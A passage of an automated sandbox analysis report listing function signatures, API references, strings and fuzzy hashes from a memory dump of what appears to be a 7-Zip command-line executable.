                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                                                                                                                                                        • Instruction ID: 0ff665a50b996d68ad4ba52105a89f649b48e27a4d26fabf249a80f2a0a06bca
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC01DA6735B99045C611FB22E4A276F6791E7C3F92F0510E29F4E63715CE38C44ACB04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                                                                                                                                                        • Instruction ID: 638129700bc3dc4bc69d08d80ced211e8f30d4e8af999f32fad46feae72251f4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5101A46335798045CA11FF26E46176F6390EBC7B92F0510E2AF4E63721DE38C48BCA08
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                                                                                                                                                        • Instruction ID: f0900aafaed6ecc96b6f6abdb9546ae9710a7f37ecf586e600bb28fee1bc51a2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA011A23713D8089CA10EF36DC9126A23A0EB87B9A71841F2BF1D5B725DE20CC5A8740
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                        • Instruction ID: 08f9867b2c58ce82eb1ffb1d3dc92c214e359ea92e1409eef43528056fc01f4b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68011A63713D808ACB10BF36DC9136967A0EB86B9AB1841F1BF2D6B755DE60C84A8744
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9C91C
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9C9F1
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: memset.MSVCRT ref: 00B9B20D
                                                                                                                                                                                                          • Part of subcall function 00B9B1C8: fputs.MSVCRT ref: 00B9B232
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B5237E
                                                                                                                                                                                                          • Part of subcall function 00B52320: fputs.MSVCRT ref: 00B523B8
                                                                                                                                                                                                          • Part of subcall function 00B52320: free.MSVCRT ref: 00B523C4
                                                                                                                                                                                                          • Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B9CADA
                                                                                                                                                                                                          • Part of subcall function 00B522E4: fflush.MSVCRT ref: 00B522EB
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$free$fflushfputcmemset
                                                                                                                                                                                                        • String ID: ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                        • API String ID: 2975459029-4064182643
                                                                                                                                                                                                        • Opcode ID: 0028e4c7587573bd9f515618cfbb5301f3e1817b887f44ee0e76695e23076ce5
                                                                                                                                                                                                        • Instruction ID: c82917c9ae0aefe2926f429d8e4bd3a08e7ea0fb65e8e4af3af9a272a82ef2dd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0028e4c7587573bd9f515618cfbb5301f3e1817b887f44ee0e76695e23076ce5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5617A66301A859ACE39EB72E59137E7B91F746B80F4880F6DF1F07602DF28D8988354
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID: : $...$Junction: $REPARSE:
                                                                                                                                                                                                        • API String ID: 1294909896-1476144188
                                                                                                                                                                                                        • Opcode ID: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                                                                                        • Instruction ID: c822c53b926a2fd8a4ebd10c2bbc6a9241f5e80bc58df3d1809f643740920a91
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0451F422214A0492CF20EF25E89136E77E1FB81BE5F8490A6EE8747764DF78C549CB10
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 00B90E9C
                                                                                                                                                                                                          • Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
                                                                                                                                                                                                          • Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B90F5D
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B90FD8
                                                                                                                                                                                                        • fputs.MSVCRT ref: 00B90FF4
                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00B91092
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$CriticalSection$EnterLeavefreememmove
                                                                                                                                                                                                        • String ID: ???
                                                                                                                                                                                                        • API String ID: 2578255354-1053719742
                                                                                                                                                                                                        • Opcode ID: be1a40be557d259925390312d71c451b002569341349d622961d0d476c9d9d15
                                                                                                                                                                                                        • Instruction ID: b8f9245d09066f0c04f6ad30ae918c9ef1c336238d799e9b4228715dadd83f18
                                                                                                                                                                                                        • Opcode Fuzzy Hash: be1a40be557d259925390312d71c451b002569341349d622961d0d476c9d9d15
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B519E32310A81A6DE18EB25DA903ED73A0F785B95F4485A2DF2D47760DF78D9A9C300
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • with the file from archive:, xrefs: 00B90D1C
                                                                                                                                                                                                        • Would you like to replace the existing file:, xrefs: 00B90CF0
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CriticalSectionfputs$EnterLeave
                                                                                                                                                                                                        • String ID: Would you like to replace the existing file:$with the file from archive:
                                                                                                                                                                                                        • API String ID: 3346953513-686978020
                                                                                                                                                                                                        • Opcode ID: 7412e7fb1b6ccc606eca1224af26252d797eb43481bfe92c889a2551bdc217a5
                                                                                                                                                                                                        • Instruction ID: 165f3ad9dea0910cdb9139aeb9257b478a20cdeae48afb3dc3dc0ed44a1687ae
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7412e7fb1b6ccc606eca1224af26252d797eb43481bfe92c889a2551bdc217a5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8411862364B829ADF28AF65D8903A873E0FB85B90F4481729F6D47751CF3CD898D305
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CriticalSectionfputs$EnterLeavefree
                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                        • API String ID: 1989314732-3653984579
                                                                                                                                                                                                        • Opcode ID: a9e7b779069d7613123e0b6a527abe8c78201bf88696ae9abb195fc48f8ffdd4
                                                                                                                                                                                                        • Instruction ID: 955637328f50edf78d69ffe411faaf0b4cc9ac0b600d19fae1e5bb15a00b7231
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a9e7b779069d7613123e0b6a527abe8c78201bf88696ae9abb195fc48f8ffdd4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2316D76204A4191DB11DF29D8403AD33B0F789FA8F484672DE5D4B7A8CF78C889D314
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Enter password (will not be echoed):, xrefs: 00B9CE69
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ConsoleMode$Handlefflushfputs
                                                                                                                                                                                                        • String ID: Enter password (will not be echoed):
                                                                                                                                                                                                        • API String ID: 108775803-3720017889
                                                                                                                                                                                                        • Opcode ID: b3b14cee00391645aedadfe40ccae594c45a57101052151f518e341e407f9c9a
                                                                                                                                                                                                        • Instruction ID: 2dadb777be9da65d17147974a217afde5010ad2b84b5c808d35c2cd7654cc644
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b3b14cee00391645aedadfe40ccae594c45a57101052151f518e341e407f9c9a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE21C82230660183EE189B65A95473937E1EB497F1F1852B1EF1B873E5DF6CC889C300
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputsfree
                                                                                                                                                                                                        • String ID: Can not open the file$The archive is open with offset$The file is open$WARNING:
                                                                                                                                                                                                        • API String ID: 2581285248-3393983761
                                                                                                                                                                                                        • Opcode ID: 508089e93e5762c25ef1d7ab05736a957ed921444384873a384d5238f926eb99
                                                                                                                                                                                                        • Instruction ID: 9db151f8898780f6cedf4df03f90388b262bed99ee4b7340687f630863fc8bd2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 508089e93e5762c25ef1d7ab05736a957ed921444384873a384d5238f926eb99
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C221C86330190699CE21DF25E85039D37A0F7CABE5F4452A1EF1E43365EF28C54AC700
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                                                                                                                                                        • Instruction ID: 1d0784442040721e9040a46c1da9ca7e6f794c30f21edf9c62ba0b815361b135
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A71D52325DAC086C621EB25E44079FB7E1F7CA754F645192EBD953B69CF38C949CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                                                                                        • Opcode ID: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                                                                                                                                                        • Instruction ID: 62981dbc68ed6c717c3577b5aaaaf2e97a23493a5848d6dbd03258b719a9febc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F641052320968494CF32AF39D441BAA37E0D792B98F14C1D1EE6E07795DF79C68ACB01
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: freememmove$ExceptionThrowmalloc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1818558235-0
                                                                                                                                                                                                        • Opcode ID: 765776f35c77edad6c13728d38dc7fcf5a9f6dac0127373448571f55f4189822
                                                                                                                                                                                                        • Instruction ID: e1e857041e7aed522ecdaf406d2fb4ae44b45010d163df4c6bb0585009f3b45c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 765776f35c77edad6c13728d38dc7fcf5a9f6dac0127373448571f55f4189822
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D3161B27226508B8B64EF7BD49251E73E4E745FD871480A6DF2D97708DA30DC82CB80
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                                                                                        • Instruction ID: 89d6b6d9bc9d173c96194450e89de6d6f29aec721bba80d4ce3822a221c850b5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63F0976235B99585CA14FF32C49566F6791EBC7F82B0524E1AF4E73725DE28C40ACA04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                        • Instruction ID: 1fc77c1e1da36546246d9276a30c07bde4d11ca63bc23a258904f27346f8bc6b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3BF0742634BD9085CA14BB32C4A572F6791F7C3F86F0554E1AF4E63715CE28C44ACA05
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                        • Instruction ID: 8bc2a2e6d177045ac8bb21d68d2368ba1e394b45d17251839dbfe8f73b2f7e33
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4F0C42238BA8141CA10FF32C895B2F67A1F7C3F82B0510D1AF4E63711CE28C40ACA04
                                                                                                                                                                                                        APIs
